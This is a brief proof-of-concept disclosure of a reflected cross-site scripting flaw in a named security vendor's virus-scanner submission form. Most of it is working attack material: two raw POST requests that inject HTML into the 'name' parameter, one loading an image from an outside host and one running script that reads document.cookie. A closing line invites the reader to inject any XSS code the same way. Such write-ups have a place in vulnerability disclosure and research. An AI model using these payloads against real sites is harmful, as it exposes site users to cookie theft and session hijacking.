Fortiguard.com virus scanner submission form XSS bug
Vulnerable page: https://submission.fortinet.com/ @ http://www.fortiguard.com/PoC
POST /scanner.php HTTP/1.1Host: submission.fortinet.com
name="><img src=http://te-home.net/images/logo.png>
POST /scanner.php HTTP/1.1
Host: submission.fortinet.com
name="><script>alert(document.cookie)</script>
You can either include any XSS code in name input box, or request any XSS code directly using POST method and name parameter.
Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.